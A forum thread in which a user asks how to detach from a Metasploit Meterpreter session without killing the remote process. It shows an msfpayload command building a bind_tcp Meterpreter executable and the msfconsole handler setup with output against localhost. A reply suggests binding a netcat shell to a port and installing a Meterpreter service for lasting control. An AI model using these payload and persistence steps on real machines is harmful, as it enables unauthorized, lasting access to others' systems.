Thread: Meterpreter ... HOWTO disconnect from session without exiting meterpreter proccess

Hybrid View

Just burned his ISO

Default Meterpreter ... HOWTO disconnect from session without exiting meterpreter proccess

Meterpreter ... HOWTO disconnect from session without exiting meterpreter remote proccess...

I created payload...
    Code:
    msfpayload windows/meterpreter/bind_tcp LPORT=4444 X > bind.exe
    after that connected from msfconsole

Code:
    msf > use exploit/multi/handler
    msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp
    PAYLOAD => windows/meterpreter/bind_tcp
    msf exploit(handler) > set LPORT 4444
    LPORT => 4444
    msf exploit(handler) > set RHOST 127.0.0.1
    RHOST => 127.0.0.1
    msf exploit(handler) > exploit
    [*] Starting the payload handler...[*] Started bind handler[*] Transmitting intermediate stager for over-sized stage...(191 bytes)[*] Sending stage (2650 bytes)[*] Sleeping before handling stage...[*] Uploading DLL (75787 bytes)...[*] Upload completed.[*] Meterpreter session 1 opened (127.0.0.1:1234 -> 127.0.0.1:4444)

meterpreter > help
    but I d like to know howto disconnect from remote meterpreter without exiting proccess on remote machine?

scenario: connected to meterpreter > need restart on pc (running msfconsole) > restarted, lets run msfconsole and setup > cant connect because, meterpreter shutdowned

additional question: is there any way how to control mererpreter other than through msfconsole... i mean something more portable... like netcat... because if i want use remote meterpreter i must install ruby, metasploit, setup handler (not much quick)

Just burned his ISO

I believe that once you disconnect from a Meterpreter session, you can not reconnect.

The easiest thing to do in this situation, is to simply bind a shell to a port using NetCat or a similar technology. From there you can always create a payload using the Metasploit tools and run them from that command line to get Meterpreter again.

At one point, I read about a Meterpreter service that you could install to the remote PC as well to keep control.

Typically this is the role of a backdoor/rootkit, whereas Metasploit is usually used for penetration.